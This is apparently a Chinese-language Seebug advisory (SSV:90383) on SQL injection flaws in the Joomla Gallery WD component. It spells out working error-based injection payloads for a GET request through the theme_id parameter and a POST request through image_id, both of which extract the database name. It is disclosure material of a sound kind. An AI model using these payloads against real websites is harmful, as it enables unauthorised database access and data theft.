Joomla 组件Gallery WD SQL注入漏洞

2016-01-13T00:00:00
ID SSV:90383
Type seebug
Reporter kikay
Modified 2016-01-13T00:00:00

Description

0x01 漏洞简介

Joomla 组件Gallery WD存在多处SQL注入漏洞。远程攻击者可以利用该漏洞执行任意SQL指令。该插件的下载地址是:

http://extensions.joomla.org/extensions/extension/photos-a-images/galleries/gallery-wd

0x02漏洞说明

2.1参数theme_id存在GET型SQL注入漏洞

该漏洞利用的POC格式如下:

index.php?option=com_gallery_wd&view=gallerybox&image_id=19&gallery_id=2&theme_id=1 AND (SELECT 6173 FROM(SELECT COUNT(*),CONCAT(0x716b627871,(MID((IFNULL(CAST(database() AS CHAR),0x20)),1,50)),0x716a6a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) #

2.2参数image_id存在POST型注入漏洞

存在漏洞的连接地址是:

/index.php?option=com_gallery_wd&view=gallerybox&image_id=19&gallery_id=2

提交的POST请求如下:

image_id=19 AND (SELECT 6173 FROM(SELECT COUNT(*),CONCAT(0x716b627871,(MID((IFNULL(CAST(database() AS CHAR),0x20)),1,50)),0x716a6a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&rate=&ajax_task=save_hit_count&task=gallerybox.ajax_search #

0x03漏洞修复

过滤即可。